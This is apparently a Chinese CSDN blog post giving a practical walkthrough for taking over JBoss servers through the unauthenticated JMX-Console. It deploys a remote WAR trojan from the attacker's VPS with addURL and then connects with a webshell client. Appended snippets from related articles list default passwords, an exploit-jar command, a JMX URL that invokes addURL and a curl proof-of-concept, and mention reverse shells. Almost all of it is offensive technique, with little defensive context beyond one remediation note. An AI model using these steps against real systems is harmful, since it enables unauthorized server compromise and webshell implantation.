【实战】Jboss未授权访问(JMX-Console)Getshell

最新推荐文章于 2025-03-19 17:44:28 发布
最新推荐文章于 2025-03-19 17:44:28 发布
阅读量2.7k 收藏 2
点赞数 1
分类专栏: Web安全 文章标签: jboss 未授权访问 jmx-console
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cj_Allen/article/details/109522771
版权

都是重复造轮子,没啥技术含量,只能说以后遇到了知道怎么操作就行。

GO:

访问地址:http://ip/JMX-Console

在这里插入图片描述

找到jboss.deployment

在这里插入图片描述
进入页面后找到void addURL()

在这里插入图片描述

此时部署我们远程的war木马,部署好了以后点击Invoke
http:vpsIP地址/soft/cus.war

随后来到URLList中查看Value值是否已经部署好,并且为我们的远程war木马地址

在这里插入图片描述
最后点击Apply Changes 后耐心等待一会儿,然后回到JMX-Console目录中
找到jboss.web.deployment查看是否存在我们部署的war木马。

在这里插入图片描述
此时可以看到已经部署成功。访问地址:ip/cus/cus.jsp菜刀连接即可

在这里插入图片描述
在这里插入图片描述

JBoss 4.x 弱口令未授权访问 + 部署wargetshell
weixin_45253622的博客
12-09 1319
Jboss常见弱口令: admin/admin jboss/admin admin/jboss admin/123456 admin/password jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console 和 /web-console; 打开漏洞环境: 进入漏洞命令行界面: docker exec -it [镜像id] /bin/bash 登陆信息存放位置: cat /opt/jboss/jboss4/server/default/conf/props/jmx-co
【漏洞挖掘】——89、JBOSS未授权访问利用
Fly_鹏程万里
06-14 113
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用,JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范,默认情况下访问http://ip:8080/jmx-console可以浏览JBoss部署管理的信息,不需要输入用户名和密码可以直接部署上传木马存在安全隐患。
JBOSS未授权访问
jia3643的博客
09-28 1375
0X01、漏洞描述 jobss 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 fofa找个站,访问 //jmx-console/ 0X02、漏洞复现 思路一 进入 jboss.deployment 部署页面 cs搭建web服务器,上传木马,通过addurl进行远程部署 部署成功后访问 目录文件名,便可进入木马。eg:AAA.war访问 /AAA/index.jsp 思路二:直接构造poc /jmx-conso
jboss--JMX Console未授权访问
hovcfuti的博客
10-13 815
然后找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能。若需登录,可以尝试爆破弱口令登录。返回JMX Console里面,刷新找到jboss.web.deployment,如果出现上传的war,则部署成功。
Java JMX 未授权访问漏洞分析与修复指南
最新发布
虽非技冠群英首,愿与同道共长歌; 大鹏一日同风起,扶摇直上九万里;
03-19 699
Java JMX 未授权访问漏洞分析与修复指南
Jboss历史漏洞利用 - JMX Console 未授权访问漏洞
HAKUNAMATATATTA的博客
12-08 2636
Jboss的webUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin ),可导致JBoss部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell
Jboss 4.x版本jmx-console控制台弱口令getshell
来到了学渣的博客
08-31 2850
总结: 1.发现jboss4.0,尝试弱口令,成功 2.直接访问ip/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL 3.void addurl中的Param Value中插入公网部署好的war 4.返回第二步,并点击apply changes 5.查看jmx-console目录下如果有部署war的名字证明上传成功 6.ip/wa
Jboss通过未授权/弱口令进入后台上传webshell
qq_68163788的博客
06-27 1032
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
hadoop、jboss未授权访问漏洞复现与未授权访问漏洞学习(内含服务器与中间件的区别)
不想当脚本小子的脚本小子
12-30 559
hadoop:Hadoop是一个由Apache基金会所开发的分布式系统基础架构,Hadoop 默认开放了很多端口来提供 WebUI 服务,由于服务器直接在开放了Hadoop机器HDFS的50070 web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作 主要HDFS(Hadoop分布式文件系统)和MapReduce(一种编程模型)的WebUI对应的服务端口。其中比较重要的是DataNode 默认端口50075开放的话,攻击者可以通过hdsf提供的r
中间件安全:JBOSS 未授权访问漏洞.
网络安全领域___专研者.
07-30 655
JBoss 是一个基于 J2EE 的开放源代码的 应用服务器。JBoss 未授权访问漏洞允许攻击者在没有进行身份验证的情况下访问 JBoss 的管理控制台。通过该漏洞攻击者可以后台管理服务,甚至可以通过脚本命令执行系统命令,如反弹 shell、wget 写 webshell 文件等。
jbaoo4.2.3-jmx-console未授权访问.docx
04-10
jbaoo4.2.3-jmx-console未授权访问
未授权访问JBoss未授权访问漏洞
qq_68163788的博客
05-12 713
JBoss未授权访问漏洞是指攻击者可以通过构造特定的请求,在未经授权的情况下远程执行命令,进而控制服务器。该漏洞主要影响JBoss管理界面,由于默认配置下,JBoss管理界面存在弱口令和默认账户等问题,因此容易被攻击者利用。 攻击者通过向JBoss管理界面发送恶意请求,可以实现对服务器的远程命令执行、文件上传等操作。此外,由于JBoss管理界面存在多个版本,不同版本的漏洞细节也存在差异,因此需要根据具体情况进行修复。
JBoss 未授权访问和弱口令复现
weixin_53747497的博客
02-21 1576
一个基于J2EE的开放源代码的应用服务器。JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。Jboss是Java EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub。
JBoss漏洞:Jboss未授权访问漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-09 1071
Jboss未授权访问漏洞合集:JBOSS未授权访问漏洞表现为,在默认情况下无需账密就可以直接访问http://127.0.0.1:8080/jmx-console进入管理控制台,进而导致网站信息泄露、服务器被上传shell(如反弹shell,wget写webshell文件),最终网站被攻陷。 该漏洞影响所有低版本的JBOSS,对其下用户影响深远. JBoss 4 使用vulnhub提供的环境
Jboss漏洞(⾼版本JMX Console未授权
qq_68186313的博客
08-07 341
JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war , getshell。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war地址进⾏ 远程部署。3、然后输⼊Invoke。
Jboss未授权访问部署木马 利用exp
weixin_30216561的博客
04-26 500
查看系统名称 java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 查看系统版本 java -jar jboss_exploit_fat.jar -i http://www.any.c...
中间件安全-jboss未授权访问
ce666666的博客
01-23 2689
中间件是什么? 连接软件和应用的计算机软件,以便运行再一台或多台机器上的多个软件通过网络进行交互。中间件在操作系统、网络和数据库之上,应用软件的下层,总的作用是为处于自己上层的应用软件提供运行与开发的环境,帮助用户灵活、高效地开发和集成复杂的应用软件 Jboss是什么? Jboss是一个基于J2EE的开放源代码的应用服务器​ Jboss漏洞 jboss未授权访问(木马有问题) 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell
JBoss安全之jmx-console控制台未授权访问漏洞
Keep learing, and stay fast
11-02 4837
近期工作用到了jmx-console,顺便整理下JbossJmx-console密码访问相关的知识与配置。 MBean就是一种规范的JavaBean,通过集成和实现一套标准的Bean接口,这种叫MBean,Mbean注册到MBeanServer中。之后将被MBeanServer中注册过的Adapter(比如渲染为HTML的HtmlAdapter)渲染为直观的页面将MBean的属性和方法展示给用户。 MBean -> MBeanServer ...
JBoss漏洞CVE-2007-1036
01-12
### JBoss 漏洞 CVE-2007-1036 详情 JBoss 应用服务器中的 `jmx-console` 组件存在安全漏洞,允许未经身份验证的攻击者通过发送特定请求来执行任意命令。此漏洞源于对用户输入缺乏充分验证,使得恶意用户能够操纵应用程序接口并触发潜在危险操作。 受影响版本括但不限于: - JBoss Application Server 4.0.x 和 4.2.x 版本[^2] ### 影响范围与风险评估 由于 jmx-console 默认情况下处于启用状态,并且无需认证即可访问,这极大地增加了被攻击的风险。一旦成功利用该漏洞,攻击者可以在目标系统上获得较高权限,进而完全控制受感染主机。 ### 利用方式概述 为了验证是否存在此漏洞以及测试其可行性,通常会采用如下方法: 1. 构建 payload 来尝试调用敏感功能; 2. 尝试上传 JSP 木马文件到服务器端; 3. 验证是否可以正常浏览所上传的 JSP 文件以确认写入成功情况; 具体 Payload 实现可能涉及构造特殊的 HTTP 请求参数组合,这些参数会被错误处理从而导致未授权的操作被执行。 ### 获取 Shell (GetShell) 当上述步骤均顺利完成之后,最终目的是获取一个交互式的 shell 或者 reverse_shell 连接,以便进一步探索内部网络资源或实施其他形式的数据窃取行为。 ```bash curl http://target/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.system%3Aservice%3DMainDeployer&methodName=startApplication&argType=&arg0= ``` 请注意以上仅为概念证明性质的内容展示,在实际环境中应严格遵循合法合规原则进行渗透测试活动。 ### 安全修复建议 针对这一严重的安全隐患,官方已经发布了补丁程序更新了相关组件的安全机制。对于仍在使用旧版软件的企业和个人而言,强烈推荐尽快升级至最新稳定发行版,并采取额外措施加强 Web 控制台的身份验证流程,关闭不必要的管理界面公开暴露于公网之上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值